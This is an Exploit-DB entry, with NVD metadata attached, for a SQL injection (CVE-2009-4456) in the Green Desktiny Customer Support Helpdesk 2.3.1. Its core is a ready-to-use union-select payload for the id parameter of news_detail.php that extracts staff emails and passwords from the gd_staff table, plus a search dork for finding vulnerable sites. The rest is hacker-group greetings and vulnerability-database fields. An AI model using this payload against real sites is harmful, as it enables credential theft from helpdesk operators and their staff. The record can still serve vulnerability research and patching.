ID EDB-ID:10710
Type exploitdb
Reporter kaMtiEz
Modified 2009-12-26T00:00:00
Description
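Green Desktiny - Customer Support Helpdesk: SQL injection vulnerability in news_detail.php via the id parameter (CVE-2009-4456, CWE-89). Affects version 2.3.1 and possibly earlier versions. Webapps exploit for the PHP platform.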
###################################################################################
#
[~] Green Desktiny - Customer Support Helpdesk SQL injection vulnerability - (id) #
[~] Author : kaMtiEz (kamzcrew@gmail.com) #
[~] Homepage : http://www.indonesiancoder.com #
[~] Date : Desember 25, 2009 #
#
###################################################################################
[ Software Information ]
[+] Vendor : http://www.greendesktiny.com/
[+] Download : -
[+] version : 2.3.1 (lower versions may also be affected)
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : $68
[+] Location : INDONESIA - JOGJA
##################################################################################
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
[ Vulnerable File ]
http://127.0.0.1/[kaMtiEz]/news_detail.php?id=[INDONESIANCODER]
[ Exploit ]
-666/**/union/**/select/**/666,666,666,666,666,666,666,666,666,concat_ws(0x3a,email,password),@@version,666/**/from/**/gd_staff--
===========================================================================
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
[ NOTE ]
[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] sendiri dingin sepi ... tanpa sengaja menemukan celah ke 2x nya ..
[+] Dengerin Radio yach di http://antisecradio.fm manteb2 loh .. :D
[ QUOTE ]
[+] HAPPY BIRTHDAY TO DON TUKULSETO . WISH U ALL THE BEST .. KEEP MOVIN .. !
[+] merry x-mas and happy new year .. :D
[ EOF ]
[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM
{"id": "EDB-ID:10710", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Green Desktiny - Customer Support Helpdesk 2.3.1 - SQL Injection Vulnerability", "description": "Green Desktiny - Customer Support Helpdesk SQL injection vulnerability. CVE-2009-4456. Webapps exploit for php platform", "published": "2009-12-26T00:00:00", "modified": "2009-12-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/10710/", "reporter": "kaMtiEz", "references": [], "cvelist": ["CVE-2009-4456"], "lastseen": "2016-02-01T13:02:06", "viewCount": 9, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2016-02-01T13:02:06", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4456"]}], "modified": "2016-02-01T13:02:06", "rev": 2}, "vulnersScore": 6.5}, "sourceHref": "https://www.exploit-db.com/download/10710/", "sourceData": "###################################################################################\r\n #\r\n[~] Green Desktiny - Customer Support Helpdesk SQL injection vulnerability - (id) #\r\n[~] Author\t: kaMtiEz (kamzcrew@gmail.com) #\r\n[~] Homepage\t: http://www.indonesiancoder.com #\r\n[~] Date\t: Desember 25, 2009 #\r\n #\r\n###################################################################################\r\n\r\n[ Software Information ]\r\n\r\n[+] Vendor : http://www.greendesktiny.com/\r\n[+] Download : -\r\n[+] version : 2.3.1 or lower maybe also affected\r\n[+] Vulnerability : SQL injection\r\n[+] Dork : \"Think iT\"\r\n[+] Price : $68 \r\n[+] Location : INDONESIA - JOGJA\r\n\r\n##################################################################################\r\n\r\n\r\n[ HERE WE GO .. 
LIVE FROM JOGJA CITY ]\r\n\r\n[ Vulnerable File ]\r\n\r\nhttp://127.0.0.1/[kaMtiEz]/news_detail.php?id=[INDONESIANCODER]\r\n\r\n[ Exploit ]\r\n\r\n-666/**/union/**/select/**/666,666,666,666,666,666,666,666,666,concat_ws(0x3a,email,password),@@version,666/**/from/**/gd_staff--\r\n\r\n\r\n===========================================================================\r\n\r\n[ Thx TO ]\r\n\r\n[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink\r\n[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..\r\n[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,\r\n[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk\r\n\r\n[ NOTE ] \r\n\r\n[+] Nyak ama babe gua .. tak lupa adik gua ..\r\n[+] sendiri dingin sepi ... tanpa sengaja menemukan celah ke 2x nya ..\r\n[+] Dengerin Radio yach di http://antisecradio.fm manteb2 loh .. :D\r\n\r\n[ QUOTE ]\r\n\r\n[+] HAPPY BIRTHDAY TO DON TUKULSETO . WISH U ALL THE BEST .. KEEP MOVIN .. !\r\n[+] merry x-mas and happy new year .. :D\r\n\r\n[ EOF ]\r\n\r\n[+] INDONESIANOCODER TEAM\r\n[+] KILL -9 TEAM", "osvdbidlist": ["61353"]}
{"cve": [{"lastseen": "2020-10-03T11:54:20", "description": "SQL injection vulnerability in news_detail.php in Green Desktiny 2.3.1, and possibly earlier versions, allows remote attackers to execute arbitrary SQL commands via the id parameter.", "edition": 3, "cvss3": {}, "published": "2009-12-30T00:30:00", "title": "CVE-2009-4456", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4456"], "modified": "2013-08-28T06:14:00", "cpe": ["cpe:/a:greendesktiny:green_desktiny:2.3.1"], "id": "CVE-2009-4456", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4456", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:greendesktiny:green_desktiny:2.3.1:*:*:*:*:*:*:*"]}]}